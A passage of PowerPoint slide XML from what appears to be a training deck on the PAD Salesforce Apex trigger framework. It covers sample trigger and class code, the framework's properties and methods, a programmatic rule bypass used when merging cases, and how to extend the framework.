          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>You, as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Consultant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How can you work simultaneously on multiple projects ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Would it be easier if all projects are based on the same methods?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How to be able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> in short term on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>new project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How to be able to dive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>quickly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> into an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>existing project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How can you work on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>same org </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>as other consultants without any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>conflict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>You as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Customer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>How to manage the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>handover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> if any consultant or project team has a different methodology ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>What will be the cost overhead for the new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>team ramp-up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>on your existing application ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176132" name="Picture 4" descr="http://coldfusiondevelopers.com/asset/img/developer-256x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&lt;PAD – Trigger Sample&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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5791200" cy="5562600"/>
          </a:xfr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OpportunityBeforeUpdate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on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before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update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'##&gt;&gt;&gt; Opportunity before update &lt;&lt;&lt;run by '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UserInfo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getName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//AP01 Verify that Opportunity owners are legitimate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      If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isupdated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 (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ownerID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) OR new opportunity AND { opportunity stage is NOT (Identification OR Close - Cancelled}}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PAD.canTrigger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'AP01'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AP01 begin prepare'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AP01Opportunities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[]{};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Integer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()-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1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&gt;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--)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OwnerId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old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StageName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'Closed - Cancelled'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StageName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'Identification'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AP01Opportunities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add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AP01 end prepare'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AP01Opportunities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()&gt;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AP01Opportunity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LegitimateOpportunityOwners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AP01Opportunities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else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AP01 no updated owner on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()+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 opportunities'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//bypass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//AP123 Check something else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PAD.canTrigger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'AP123'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AP123 Update begin prepare'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AP123Opportunities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[]{};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Integer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()-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1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&gt;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--)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myField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old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myField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 __c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AP123Opportunities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add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AP123 Update end prepare'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AP123Opportunities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()&gt;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AP123Opportunity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setOptySetUsers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AP123Opportunities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else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AP123 no updated record on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Trigger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b="1" dirty="0" err="1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()+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 opportunities'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//bypass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'##&gt;&gt;&gt; Opportunity before update : END &lt;&lt;&lt;'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7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&lt;PAD – Class sample&gt;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685800"/>
            <a:ext cx="7315200" cy="6019800"/>
          </a:xfrm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public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class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AP06Account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	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//Number of SOQL queries: 1 out of 100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	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//Number of query rows: N out of 500, N&lt;200 (insert or update batch size)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	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//Number of DML statements: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	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//Number of DML rows: 0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static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final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Integer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THRESHOLD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45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//You can decrease this value if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hiting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 governor limits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public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static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void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OwnerConsistency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Account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Accounts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'##&gt;&gt;&gt; Starting AP06Account.OwnerConsistency &lt;&lt;&lt;'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//Account IDs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Map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&lt;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&gt;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new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Map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&lt;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&gt;();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Account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put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//Accounts' Opportunities list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=[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select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c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from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WHERE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KeySet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or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KeySet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order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by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IsClosed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];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Integer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Qty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Opportunity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Qty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&gt;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THRESHOLD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//Don't trigger anything else,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      flag this Account to be later taken into account by the external batch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AP06 the account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 will be flagged due to opportunity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OwnerUpdated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true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OwnerUpdated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true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else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Qty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++;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AP06 the opportunity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 will be updated'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//Opportunities where this account is set as End User (ref. Opportunity.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EndUser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__c)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//set the field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EndUserAccountOwner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__c with the ID of the Account Owner.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EndUserAccountOwner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EndUser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//Opportunities where this account is set as Buyer (ref.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Opportunity.AccountId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!=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null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//set the field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BuyerAccountOwner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__c with the ID of the Account Owner.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BuyerAccountOwner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__c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opty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AccountId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OwnerId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//if THRESHOLD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//for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               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Opportunities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size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()&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F7F"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0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//update Opportunities;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Database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SaveResult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[]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=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Database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Update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Opportunities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Database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SaveResult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){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//log bad updates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if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(!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isSuccess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())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Database.Error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 err = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>sr.getErrors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()[0];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for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Database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Error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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>err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getErrors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()){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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>// process any errors here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'######## AP06 Error updating :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err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getStatusCode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()+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err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getMessage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en-GB" sz="700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>else</a:t>
            </a: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 AP06 Nothing to do, no opportunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indentified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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fo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 Accounts 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mapAccountId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KeySet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());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        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System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Debug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GB" sz="700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'##&gt;&gt;&gt; End Of AP06Account.OwnerConsistency &lt;&lt;&lt;'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);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dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a: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>
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:latin typeface="Verdana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700" b="1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endParaRPr lang="en-GB" sz="7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&lt;PAD Framework – detail&gt;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Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>requiredOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : set of keywords that cannot be run multiple times when multiple triggers are launched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>hasRun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : keep it empty, only used for internal logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Public properties (read-only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_BypassTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : list of keywords configured to be bypassed for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_DebugMode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : true if developer mode is enabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>userRoleName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : Name of the Role for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>userProfileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : Name of the Profile for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Public properties (R/W)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexForcedBypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> : runtime capability to define a set through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to force temporary bypass of a keyword (see next slide)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>canTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ApexName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>) : returns true if the part of code is allowed to be run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Log : add a line for VF log component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>startTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>() : start measuring elapsed time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>stopTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>() : end of elapsed time measurement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>myColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>() : define  the color for the line of log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Limits() : dump governor limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>PAD_logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>() :  get the full log lines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean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&lt;PAD framework – programmatic bypass&gt;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9588" y="1162050"/>
            <a:ext cx="8177212" cy="5086350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>How to force bypass (temporary, through code) even if not configured at the user level ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Usage example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>: AP05 is not allowing to delete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>EmailMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t> records; when merging cases, we need to remove/create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>EmailMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t> records to the target Case. For this we need to temporary allow deletion, even if the user is not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1" smtClean="0"/>
              <a:t>byPassing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t> this rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
              <a:t>Principle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t> : Switch during the transaction into AP05 bypass, then revert to the original value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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bCanTriggerAP05=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>PAD.canTrigger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fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>'AP05'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);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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7F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>if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(bCanTriggerAP05){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="007F00"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"/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808080"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>PAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>.ApexForcedBypass.add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fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>'AP05'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);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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Verdana"/>
              </a:rPr>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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[Select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Id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from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Verdana"/>
              </a:rPr>
              <a:t>EmailMessage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where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Id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in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:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>mapOldNewParentId.keySet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()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Verdana"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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7F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>if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(bCanTriggerAP05){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="14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fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>//restore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>PAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>.ApexForcedBypass.remove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fr-FR" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F007F"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>'AP05'</a:t>
            </a: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);</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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00"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="140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&lt;PAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> – extension&gt;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You can freely extend PAD when</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>You are using frequently other values hosted on User field (or related objects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Add your field to the SELECT query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Ex : SELECT UserRole.Name,Profile.Name,UserPreferencesApexPagesDeveloperMode,PAD_BypassTrigger__c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>MyCustomField__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> FROM User WHERE Id =:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>UserInfo.getUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>() LIMIT 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>You are using frequently some utility methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Just add the method in the class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B6B6B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ex 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100" b="1" dirty="0" smtClean="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>LogRecord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> Content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>){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		       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>canTrigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>canLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>)){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		               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Log__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>=new</a:t>
            </a:r>
            <a:r>
